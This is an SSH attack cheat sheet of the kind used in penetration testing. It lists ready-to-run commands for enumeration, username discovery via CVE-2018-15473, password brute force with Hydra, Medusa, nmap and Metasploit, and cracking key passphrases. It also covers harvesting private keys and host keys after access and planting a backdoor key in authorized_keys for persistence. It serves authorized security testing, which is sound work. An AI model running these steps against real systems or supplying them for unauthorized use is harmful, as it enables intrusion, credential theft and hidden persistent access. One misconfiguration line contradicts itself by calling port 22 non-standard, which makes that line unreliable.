SSH Enumeration Cheatsheet
Default Port: 22 (TCP)
Banner & Info Gathering
nc -nv <ip> 22 # Banner grab
ssh -v <user>@<ip> # Verbose handshake output
ssh -V # Local SSH client version
# Nmap scripts
nmap -p 22 -sV <ip>
nmap -p 22 --script ssh-hostkey <ip>
nmap -p 22 --script ssh2-enum-algos <ip>
nmap -p 22 --script ssh-auth-methods \
--script-args ssh.user=<user> <ip>
nmap -p 22 --script sshv1 <ip> # Check for insecure SSHv1
ssh-audit (Configuration Security Check)
ssh-audit <ip>
ssh-audit <ip> -p 22
# Flags to note:
# [fail] = critical issue
# [warn] = should be fixed
# Lists: KEX, hostkey, encryption, MAC algorithms
User Enumeration
# CVE-2018-15473 (OpenSSH < 7.7 username enumeration)
python3 ssh_user_enum.py --userList users.txt --ip <ip>
# Metasploit
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <ip>
set USER_FILE users.txt
run
Brute Force
# Hydra
hydra -l <user> -P wordlist.txt ssh://<ip>
hydra -L users.txt -P wordlist.txt ssh://<ip>
hydra -l <user> -P wordlist.txt -s 2222 ssh://<ip> # Custom port
# Medusa
medusa -h <ip> -u <user> -P wordlist.txt -M ssh
# Nmap
nmap -p 22 --script ssh-brute <ip>
nmap -p 22 --script ssh-brute \
--script-args userdb=users.txt,passdb=pass.txt <ip>
# Metasploit
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <ip>
set USERNAME <user>
set PASS_FILE wordlist.txt
run
Key-Based Attacks
# Connect with private key
ssh -i id_rsa <user>@<ip>
chmod 600 id_rsa && ssh -i id_rsa <user>@<ip>
# Crack passphrase on private key
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=wordlist.txt
hashcat -m 22921 ssh_hash.txt wordlist.txt # Ed25519
hashcat -m 22911 ssh_hash.txt wordlist.txt # RSA
# Scan for keys (key harvesting after initial access)
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null
SSH Key Scanning
# Collect host keys
ssh-keyscan <ip>
ssh-keyscan -t rsa,ecdsa,ed25519 <ip>
ssh-keyscan -p 2222 <ip>
# Scan range
ssh-keyscan -f hosts.txt > known_hosts
Interesting Files to Grab Post-Access
~/.ssh/id_rsa # Private key
~/.ssh/id_rsa.pub # Public key
~/.ssh/authorized_keys # Authorized keys (add yours for persistence)
~/.ssh/known_hosts # Previous connections (network map)
/etc/ssh/sshd_config # Server configuration
/etc/ssh/ssh_host_rsa_key # Host private key
Add Backdoor SSH Key (Post-Exploitation)
# On attacker machine
ssh-keygen -t rsa -b 4096 -f backdoor
# On target (append to authorized_keys)
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Connect back
ssh -i backdoor <user>@<ip>
Common Misconfigurations to Check
PermitRootLogin yes — Root login allowed
PasswordAuthentication yes — Passwords accepted (brutable)
PermitEmptyPasswords yes — Blank passwords allowed
AuthorizedKeysFile .ssh/authorized_keys — Key auth path
AllowUsers / DenyUsers — User restrictions
Port 22 — Non-standard port may indicate stealth